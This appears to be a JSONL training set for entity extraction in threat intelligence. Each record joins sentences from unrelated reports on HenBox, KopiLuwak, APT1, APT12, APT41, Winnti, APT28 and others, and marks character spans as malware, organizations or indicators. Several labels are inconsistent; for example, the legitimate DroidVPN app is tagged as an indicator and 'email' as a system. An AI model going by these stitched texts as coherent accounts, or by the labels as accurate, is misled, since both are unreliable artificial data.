{"text": "The HenBox app downloaded in May 2016 was masquerading as the DroidVPN app . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 62, "end": 70, "label": "Indicator"}, {"start": 93, "end": 104, "label": "Malware"}, {"start": 129, "end": 149, "label": "Malware"}, {"start": 208, "end": 222, "label": "Organization"}, {"start": 242, "end": 256, "label": "Organization"}, {"start": 260, "end": 264, "label": "Organization"}]}
{"text": "At the time of writing , the content served at the given URL on uyghurapps [ . Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak . APT1 were a highly prolific cyber-attack group operating out of China .", "spans": [{"start": 64, "end": 78, "label": "Indicator"}, {"start": 90, "end": 95, "label": "Organization"}, {"start": 179, "end": 183, "label": "Organization"}]}
{"text": "] net , is now a legitimate version of the DroidVPN app , and looks as shown in Figure 1 below . RocketMan!\u201d (probably a reference to Donald Trump\u2019s nickname for Kim Jong Un) and MiamiBeach\u201d serve as the first beacon messages from the victim to the control server . APT1 is a China-based cyber-espionage group , active since mid-2006 .", "spans": [{"start": 43, "end": 51, "label": "Indicator"}, {"start": 97, "end": 108, "label": "Malware"}, {"start": 179, "end": 190, "label": "Malware"}, {"start": 266, "end": 270, "label": "Organization"}]}
{"text": "henbox_2 Figure 1 Uyghurapps [ . These could be tools to circumvent internet censorship , such as Softether VPN 4.12\u201d and psiphon3\u201d , or Microsoft Office activators\u201d . APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals .", "spans": [{"start": 18, "end": 32, "label": "Indicator"}, {"start": 98, "end": 117, "label": "Malware"}, {"start": 122, "end": 131, "label": "Malware"}, {"start": 137, "end": 165, "label": "Malware"}, {"start": 168, "end": 173, "label": "Organization"}]}
{"text": "] net app store showing the current DroidVPN app Virtual Private Network ( VPN ) tools allow connections to remote private networks , increasing the security and privacy of the user \u2019 s communications . These campaign-related VPSs are located in South Africa . Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE .", "spans": [{"start": 36, "end": 44, "label": "Indicator"}, {"start": 226, "end": 230, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 304, "end": 311, "label": "Organization"}, {"start": 325, "end": 330, "label": "Organization"}, {"start": 368, "end": 376, "label": "Malware"}]}
{"text": "According to the DroidVPN app description , it \u201c helps bypass regional internet restrictions , web filtering and firewalls by tunneling traffic over ICMP. \u201d Some features may require devices to be rooted to function and according to some 3rd party app stores , unconditional rooting is required , which has additional security implications for the device . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . However , the malware shared several traits with the RIPTIDE and HIGHTIDE backdoor that we have attributed to APT12 .", "spans": [{"start": 17, "end": 25, "label": "Indicator"}, {"start": 390, "end": 396, "label": "Malware"}, {"start": 418, "end": 424, "label": "Malware"}, {"start": 427, "end": 435, "label": "Malware"}, {"start": 440, "end": 453, "label": "Malware"}, {"start": 456, "end": 482, "label": "Malware"}, {"start": 538, "end": 545, "label": "Malware"}, {"start": 550, "end": 567, "label": "Malware"}, {"start": 595, "end": 600, "label": "Organization"}]}
{"text": "We have not been able to ascertain how the DroidVPN app on the uyghurapps [ . The PowerShell version of the Trojan also has the ability to get screenshots . From October 2012 to May 2014 , FireEye observed APT12 utilizing RIPTIDE , that communicates via HTTP to a hard-coded command and control ( C2 ) server .", "spans": [{"start": 43, "end": 51, "label": "Indicator"}, {"start": 63, "end": 77, "label": "Indicator"}, {"start": 82, "end": 92, "label": "Malware"}, {"start": 139, "end": 142, "label": "Malware"}, {"start": 143, "end": 154, "label": "Malware"}, {"start": 189, "end": 196, "label": "Organization"}, {"start": 206, "end": 211, "label": "Organization"}, {"start": 222, "end": 229, "label": "Malware"}, {"start": 254, "end": 258, "label": "Malware"}, {"start": 297, "end": 299, "label": "System"}]}
{"text": "] net app store was replaced with the malicious HenBox app ; however , some indicators point to the server running an outdated version of Apache Web Server on a Windows 32-Bit operating system . The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen\u201d command to take a screenshot . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": [{"start": 48, "end": 54, "label": "Malware"}, {"start": 161, "end": 168, "label": "System"}, {"start": 199, "end": 205, "label": "Malware"}, {"start": 230, "end": 251, "label": "Malware"}, {"start": 388, "end": 393, "label": "Organization"}, {"start": 422, "end": 430, "label": "Malware"}, {"start": 439, "end": 453, "label": "System"}, {"start": 456, "end": 460, "label": "Indicator"}, {"start": 486, "end": 499, "label": "Vulnerability"}]}
{"text": "In light of this , we believe an attack against unpatched vulnerabilities is a reasonable conjecture for how the server was compromised . The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset .", "spans": [{"start": 48, "end": 73, "label": "Vulnerability"}, {"start": 151, "end": 160, "label": "System"}, {"start": 222, "end": 227, "label": "Organization"}, {"start": 306, "end": 313, "label": "Organization"}, {"start": 339, "end": 346, "label": "Malware"}, {"start": 350, "end": 358, "label": "Malware"}, {"start": 429, "end": 434, "label": "Organization"}]}
{"text": "The HenBox app downloaded in May 2016 , as described in Table 1 below , masquerades as a legitimate version of the DroidVPN app by using the same app name \u201c DroidVPN \u201d and the same iconography used when displaying the app in Android \u2019 s launcher view , as highlighted in Figure 2 below Table 1 . Winnti's mode of operation: to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": [{"start": 115, "end": 123, "label": "Indicator"}, {"start": 157, "end": 165, "label": "System"}, {"start": 225, "end": 232, "label": "System"}, {"start": 296, "end": 304, "label": "Organization"}, {"start": 369, "end": 388, "label": "Organization"}, {"start": 441, "end": 466, "label": "Organization"}, {"start": 557, "end": 566, "label": "Organization"}, {"start": 569, "end": 577, "label": "Organization"}, {"start": 582, "end": 594, "label": "Organization"}, {"start": 632, "end": 636, "label": "Malware"}, {"start": 645, "end": 655, "label": "Malware"}, {"start": 671, "end": 691, "label": "Malware"}]}
{"text": "APK SHA256 Size ( bytes ) First Seen App Package name App name 0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 com.android.henbox DroidVPN Table 1 Details of the HenBox DroidVPN app on the uyghurapps [ . Hackers usually take precautions , which experts refer to as Opsec . A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity .", "spans": [{"start": 63, "end": 127, "label": "Indicator"}, {"start": 147, "end": 165, "label": "Indicator"}, {"start": 166, "end": 174, "label": "System"}, {"start": 198, "end": 204, "label": "Malware"}, {"start": 205, "end": 213, "label": "System"}, {"start": 225, "end": 239, "label": "Indicator"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 350, "end": 357, "label": "Organization"}, {"start": 460, "end": 469, "label": "Organization"}]}
{"text": "] net app store henbox_3 Figure 2 HenBox app installed , purporting to be DroidVPN Depending on the language setting on the device , and for this particular variant of HenBox , the installed HenBox app may have the name \u201c Backup \u201d but uses the same DroidVPN logo . The Winnti group\u2019s Opsec was dismal to say the least . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 34, "end": 40, "label": "Malware"}, {"start": 74, "end": 82, "label": "Indicator"}, {"start": 168, "end": 174, "label": "Malware"}, {"start": 191, "end": 197, "label": "Malware"}, {"start": 249, "end": 257, "label": "Indicator"}, {"start": 269, "end": 275, "label": "Organization"}, {"start": 358, "end": 367, "label": "Organization"}, {"start": 372, "end": 392, "label": "Organization"}, {"start": 432, "end": 438, "label": "System"}, {"start": 481, "end": 490, "label": "Organization"}]}
{"text": "Other variants use other names and logos , as described later . This mode of operation is typical of many hacker groups\u2014and especially of Winnti . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families .", "spans": [{"start": 106, "end": 112, "label": "Organization"}, {"start": 138, "end": 144, "label": "Organization"}, {"start": 171, "end": 189, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 294, "end": 313, "label": "Malware"}, {"start": 318, "end": 354, "label": "Malware"}]}
{"text": "Given the DroidVPN look and feel being used by this variant of HenBox , it \u2019 s highly likely the uyghurapps [ . They are a very , very persistent group , \u201d says Costin Raiu , who has been watching Winnti since 2011 . With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": [{"start": 10, "end": 18, "label": "Indicator"}, {"start": 63, "end": 69, "label": "Malware"}, {"start": 97, "end": 111, "label": "Indicator"}, {"start": 161, "end": 172, "label": "Organization"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 326, "end": 340, "label": "Organization"}, {"start": 343, "end": 357, "label": "Organization"}, {"start": 444, "end": 451, "label": "Organization"}, {"start": 454, "end": 460, "label": "Organization"}, {"start": 463, "end": 470, "label": "Organization"}, {"start": 473, "end": 479, "label": "Organization"}]}
{"text": "] net page for DroidVPN remained identical when serving either HenBox or DroidVPN apps , just that the legitimate APK file had been replaced with HenBox for an unknown period of time . Raiu and his team have followed the digital tracks left behind by some of the Winnti hackers . Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": [{"start": 15, "end": 23, "label": "Indicator"}, {"start": 63, "end": 69, "label": "Malware"}, {"start": 73, "end": 81, "label": "Indicator"}, {"start": 185, "end": 189, "label": "Organization"}, {"start": 263, "end": 269, "label": "Organization"}, {"start": 280, "end": 294, "label": "Organization"}, {"start": 381, "end": 388, "label": "Organization"}, {"start": 391, "end": 397, "label": "Organization"}, {"start": 400, "end": 407, "label": "Organization"}, {"start": 410, "end": 416, "label": "Organization"}]}
{"text": "In addition to the look and feel of DroidVPN , this HenBox variant also contained a legitimate DroidVPN app within its APK package as an asset , which could be compared to a resource item within a Windows Portable Executable ( PE ) file . One government official puts it very matter-of-factly: Winnti is very specific to Germany . The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits \u2014 and a retooling of what security researchers believe is a massive spying operation based in China .", "spans": [{"start": 36, "end": 44, "label": "Indicator"}, {"start": 52, "end": 58, "label": "Malware"}, {"start": 95, "end": 103, "label": "Indicator"}, {"start": 197, "end": 224, "label": "System"}, {"start": 294, "end": 300, "label": "Organization"}, {"start": 395, "end": 400, "label": "Organization"}]}
{"text": "Once the HenBox app is installed and launched , it launches an install process for the embedded app as a decoy to other malicious behaviors occurring in the background , and to satisfy the victim with the app they were requesting , assuming they requested to download a particular app , such as DroidVPN . By 2014 , the Winnti malware code was no longer limited to game manufacturers . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries .", "spans": [{"start": 9, "end": 15, "label": "Malware"}, {"start": 295, "end": 303, "label": "System"}, {"start": 320, "end": 326, "label": "Organization"}, {"start": 365, "end": 383, "label": "Organization"}, {"start": 471, "end": 476, "label": "Organization"}, {"start": 551, "end": 560, "label": "Organization"}, {"start": 563, "end": 582, "label": "Organization"}, {"start": 585, "end": 590, "label": "Organization"}, {"start": 595, "end": 624, "label": "Organization"}]}
{"text": "The version of the legitimate DroidVPN embedded inside this HenBox variant is the same version of DroidVPN available for download from uyghurapps [ . Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries .", "spans": [{"start": 30, "end": 38, "label": "Indicator"}, {"start": 60, "end": 66, "label": "Malware"}, {"start": 98, "end": 106, "label": "Indicator"}, {"start": 135, "end": 149, "label": "Indicator"}, {"start": 150, "end": 156, "label": "Organization"}, {"start": 170, "end": 189, "label": "Organization"}, {"start": 214, "end": 238, "label": "Organization"}, {"start": 326, "end": 336, "label": "Organization"}, {"start": 431, "end": 440, "label": "Organization"}, {"start": 443, "end": 462, "label": "Organization"}, {"start": 465, "end": 470, "label": "Organization"}, {"start": 475, "end": 504, "label": "Organization"}]}
{"text": "] net , at the time of writing . Winnti is attacking companies in Japan , France , the U.S. and Germany . On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": [{"start": 33, "end": 39, "label": "Organization"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 211, "end": 217, "label": "System"}, {"start": 239, "end": 248, "label": "Organization"}, {"start": 253, "end": 272, "label": "Organization"}]}
{"text": "It \u2019 s worth noting , newer versions of the DroidVPN app are available on Google Play , as well as in some other third-party app stores , which could indicate uyghurapps [ . The Winnti hackers broke into Henkel\u2019s network in 2014 . On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": [{"start": 44, "end": 52, "label": "System"}, {"start": 74, "end": 85, "label": "System"}, {"start": 159, "end": 173, "label": "Indicator"}, {"start": 178, "end": 184, "label": "Organization"}, {"start": 204, "end": 212, "label": "Organization"}, {"start": 340, "end": 346, "label": "System"}, {"start": 368, "end": 377, "label": "Organization"}, {"start": 382, "end": 401, "label": "Organization"}]}
{"text": "] net is not awfully well maintained or updated to the latest apps available . Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 .", "spans": [{"start": 79, "end": 85, "label": "Organization"}, {"start": 99, "end": 105, "label": "Organization"}, {"start": 436, "end": 441, "label": "Organization"}]}
{"text": "At the time of writing , to our knowledge no other third-party app stores , nor the official Google Play store , were or are hosting this malicious HenBox variant masquerading as DroidVPN . Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach . APT16 actors sent spear phishing emails to two Taiwanese media organizations .", "spans": [{"start": 93, "end": 104, "label": "System"}, {"start": 148, "end": 154, "label": "Malware"}, {"start": 179, "end": 187, "label": "Indicator"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 254, "end": 260, "label": "Organization"}, {"start": 297, "end": 309, "label": "Organization"}, {"start": 330, "end": 336, "label": "System"}, {"start": 354, "end": 373, "label": "Organization"}]}
{"text": "The Right App at the Right Time The malicious HenBox and embedded DroidVPN app combination is one instance of the type of legitimate apps the attackers choose to mimic to compromise their victims . The hackers behind Winnti have also set their sights on Japan\u2019s biggest chemical company , Shin-Etsu Chemical . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website .", "spans": [{"start": 46, "end": 52, "label": "Malware"}, {"start": 66, "end": 74, "label": "Indicator"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 270, "end": 286, "label": "Organization"}, {"start": 289, "end": 307, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 357, "end": 362, "label": "Organization"}, {"start": 383, "end": 393, "label": "Organization"}, {"start": 420, "end": 437, "label": "Organization"}]}
{"text": "These threat actors frequently offer malicious apps purporting to be legitimate apps that are broadly used or important to a targeted population . In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor .", "spans": [{"start": 189, "end": 206, "label": "Organization"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 374, "end": 391, "label": "Organization"}, {"start": 474, "end": 488, "label": "Malware"}]}
{"text": "It \u2019 s worth noting however , about one-third of the HenBox apps contained embedded APK objects that did not refer to legitimate apps . Winnti hackers also penetrated the BASF and Siemens networks . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 .", "spans": [{"start": 53, "end": 59, "label": "Malware"}, {"start": 136, "end": 142, "label": "Organization"}, {"start": 171, "end": 175, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 188, "end": 196, "label": "Organization"}, {"start": 277, "end": 296, "label": "Organization"}, {"start": 340, "end": 345, "label": "Organization"}]}
{"text": "Some were only 3 bytes long , containing strings such as \u201c ddd \u201d and \u201c 333 \u201d , or were otherwise corrupted . Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti . The suspected APT16 targeting of the Taiwanese government agency \u2013 in addition to the Taiwanese media organizations \u2013 further supports this possibility .", "spans": [{"start": 172, "end": 192, "label": "Organization"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 241, "end": 246, "label": "Organization"}, {"start": 274, "end": 291, "label": "Organization"}, {"start": 323, "end": 342, "label": "Organization"}]}
{"text": "Beyond the previously mentioned DroidVPN example , other viable embedded apps we found include apps currently available on Google Play , as well as many third-party app stores . At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters . APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" .", "spans": [{"start": 32, "end": 40, "label": "Indicator"}, {"start": 123, "end": 134, "label": "System"}, {"start": 181, "end": 190, "label": "Organization"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 368, "end": 370, "label": "Indicator"}, {"start": 387, "end": 398, "label": "Malware"}, {"start": 399, "end": 406, "label": "Malware"}, {"start": 421, "end": 430, "label": "Organization"}, {"start": 495, "end": 525, "label": "Organization"}]}
{"text": "Table 2 below lists some of these apps with their respective metadata . To witnesses , the spy appears to be running a program showing videos (e.g VLC) , presenting slides (Prezi) , playing a computer game (Breakout2 , 2048) or even running a fake virus scanner . APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": [{"start": 91, "end": 94, "label": "Organization"}, {"start": 154, "end": 171, "label": "System"}, {"start": 243, "end": 261, "label": "System"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 286, "end": 295, "label": "Organization"}, {"start": 333, "end": 353, "label": "Organization"}, {"start": 410, "end": 429, "label": "Organization"}, {"start": 436, "end": 452, "label": "Organization"}, {"start": 455, "end": 464, "label": "Organization"}, {"start": 467, "end": 499, "label": "Organization"}, {"start": 502, "end": 518, "label": "Organization"}, {"start": 525, "end": 553, "label": "Organization"}]}
{"text": "Sample 1 marks the first HenBox sample we saw embedding a legitimate app within its assets to be dropped and installed on the victim device as a decoy . From the time of file creation , the attacker started working at least as early as July 2018 . FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines .", "spans": [{"start": 25, "end": 31, "label": "Malware"}, {"start": 190, "end": 198, "label": "Organization"}, {"start": 248, "end": 255, "label": "Organization"}, {"start": 270, "end": 275, "label": "Organization"}, {"start": 286, "end": 297, "label": "Malware"}]}
{"text": "The legitimate app in question was a Uyghur language keyboard app targeted at native speakers of the Uyghur language and their smartphones . The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky\u2019s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features . The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight .", "spans": [{"start": 231, "end": 242, "label": "Organization"}, {"start": 301, "end": 309, "label": "Organization"}, {"start": 420, "end": 431, "label": "Malware"}, {"start": 445, "end": 450, "label": "Organization"}]}
{"text": "Sample 2 , has the package name cn.android.setting masquerading as Android \u2019 s Settings app , which has a similar package name ( com.android.settings ) . For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology .", "spans": [{"start": 32, "end": 50, "label": "Indicator"}, {"start": 79, "end": 91, "label": "System"}, {"start": 129, "end": 149, "label": "Indicator"}, {"start": 168, "end": 173, "label": "Organization"}, {"start": 178, "end": 184, "label": "Organization"}, {"start": 328, "end": 335, "label": "Organization"}, {"start": 491, "end": 501, "label": "Organization"}, {"start": 504, "end": 514, "label": "Organization"}, {"start": 517, "end": 530, "label": "Organization"}, {"start": 533, "end": 552, "label": "Organization"}, {"start": 555, "end": 565, "label": "Organization"}, {"start": 568, "end": 582, "label": "Organization"}, {"start": 589, "end": 607, "label": "Organization"}]}
{"text": "This variant of HenBox also used the common green Android figure as the app logo and was named \u8bbe\u7f6e ( \u201c Backup \u201d in English ) . Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities . The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system .", "spans": [{"start": 16, "end": 22, "label": "Malware"}, {"start": 50, "end": 57, "label": "System"}, {"start": 138, "end": 146, "label": "Organization"}, {"start": 149, "end": 155, "label": "Organization"}, {"start": 160, "end": 165, "label": "Organization"}, {"start": 302, "end": 307, "label": "Organization"}, {"start": 327, "end": 340, "label": "Malware"}, {"start": 363, "end": 370, "label": "System"}]}
{"text": "This variant \u2019 s app name , along with many others , is written in Chinese and describes the app as a backup tool . APT41 espionage operations against the healthcare , high-tech , and telecommunications sectors include establishing and maintaining strategic access , and through mid-2015 , the theft of intellectual property . The malware used by the Wekby group has ties to the HTTPBrowser malware family , and uses DNS requests as a command and control mechanism .", "spans": [{"start": 116, "end": 121, "label": "Organization"}, {"start": 155, "end": 165, "label": "Organization"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 184, "end": 210, "label": "Organization"}, {"start": 351, "end": 362, "label": "Organization"}, {"start": 379, "end": 405, "label": "Malware"}, {"start": 417, "end": 420, "label": "Indicator"}]}
{"text": "Please see the IOCs section for all app and package name combinations . FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware . These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) .", "spans": [{"start": 72, "end": 79, "label": "Organization"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 225, "end": 244, "label": "Organization"}, {"start": 480, "end": 491, "label": "Malware"}, {"start": 505, "end": 518, "label": "Malware"}, {"start": 526, "end": 537, "label": "Organization"}, {"start": 566, "end": 569, "label": "System"}]}
{"text": "Interestingly , the embedded app in sample 2 is not a version of the Android Settings app but instead the \u201c Amaq Agency \u201d app , which reports on ISIS related news . APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": [{"start": 69, "end": 85, "label": "System"}, {"start": 108, "end": 119, "label": "System"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 343, "end": 348, "label": "Organization"}, {"start": 374, "end": 394, "label": "Organization"}, {"start": 426, "end": 435, "label": "Organization"}, {"start": 438, "end": 447, "label": "Organization"}, {"start": 450, "end": 464, "label": "Organization"}, {"start": 469, "end": 483, "label": "Organization"}]}
{"text": "Reports indicate fake versions of the Amaq app exist , likely in order to spy on those that use it . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions . APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": [{"start": 38, "end": 42, "label": "System"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 324, "end": 329, "label": "Organization"}, {"start": 355, "end": 375, "label": "Organization"}, {"start": 413, "end": 422, "label": "Organization"}, {"start": 451, "end": 460, "label": "Organization"}, {"start": 479, "end": 489, "label": "Organization"}, {"start": 501, "end": 515, "label": "Organization"}, {"start": 520, "end": 534, "label": "Organization"}]}
{"text": "A month after observing sample 2 , we obtained another which used the same package name as sample 2 ( cn.android.setting ) . Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests . FANCY BEAR ( also known as Sofacy or APT28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": [{"start": 102, "end": 120, "label": "Indicator"}, {"start": 186, "end": 193, "label": "Organization"}, {"start": 215, "end": 234, "label": "Organization"}, {"start": 360, "end": 370, "label": "Organization"}, {"start": 387, "end": 393, "label": "Organization"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 558, "end": 567, "label": "Organization"}, {"start": 570, "end": 577, "label": "Organization"}, {"start": 580, "end": 586, "label": "Organization"}, {"start": 589, "end": 599, "label": "Organization"}, {"start": 604, "end": 617, "label": "Organization"}]}
{"text": "However , this time the app name for both HenBox and the embedded app were identical : Islamawazi . APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed . APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment .", "spans": [{"start": 42, "end": 48, "label": "Malware"}, {"start": 87, "end": 97, "label": "System"}, {"start": 100, "end": 105, "label": "Organization"}, {"start": 171, "end": 178, "label": "Organization"}, {"start": 289, "end": 294, "label": "Malware"}, {"start": 295, "end": 302, "label": "Malware"}, {"start": 364, "end": 373, "label": "Malware"}]}
{"text": "Islamawazi is also known as the Turkistan Islamic Party or \u201c TIP \u201d . Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity . However , three themes in APT28 's targeting clearly reflects LOCs of specific interest to an Eastern European government , most likely the Russian government .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 32, "end": 55, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 300, "end": 305, "label": "Organization"}, {"start": 385, "end": 395, "label": "Organization"}, {"start": 414, "end": 432, "label": "Organization"}]}
{"text": "This organization was formerly known as the East Turkestan Islamic Party and is purported to be an Islamic extremist separatist organization founded by Uyghur jihadists . Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government .", "spans": [{"start": 44, "end": 72, "label": "Organization"}, {"start": 233, "end": 238, "label": "Organization"}, {"start": 431, "end": 436, "label": "Organization"}, {"start": 519, "end": 537, "label": "Organization"}]}
{"text": "The embedded app appears to be a media player . APT41 has targeted organizations in 14 countries (and Hong Kong) over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics .", "spans": [{"start": 48, "end": 53, "label": "Organization"}, {"start": 489, "end": 495, "label": "Organization"}]}
{"text": "These examples , together with the HenBox app placed on a very specific third-party app store , point clearly to at least some of the intended targets of these malicious apps being Uyghurs , specifically those with interest in or association with terrorist groups . APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities . Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials .", "spans": [{"start": 35, "end": 41, "label": "Malware"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 301, "end": 309, "label": "Organization"}, {"start": 450, "end": 466, "label": "Organization"}]}
{"text": "These threat actors appear to be choosing the right apps \u2013 those that could be popular with locals in the region , at the right time \u2013 while tensions grow in this region of China , to ensure a good victim install-base . We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor .", "spans": [{"start": 277, "end": 282, "label": "Organization"}, {"start": 411, "end": 416, "label": "Organization"}, {"start": 598, "end": 616, "label": "Organization"}, {"start": 620, "end": 625, "label": "Organization"}]}
{"text": "HenBox Roosts HenBox has evolved over the past three years , and of the almost two hundred HenBox apps in AutoFocus , the vast majority contain several native libraries as well as other components in order to achieve their objective . In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously . We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 14, "end": 20, "label": "Malware"}, {"start": 91, "end": 97, "label": "Malware"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 442, "end": 447, "label": "Organization"}]}
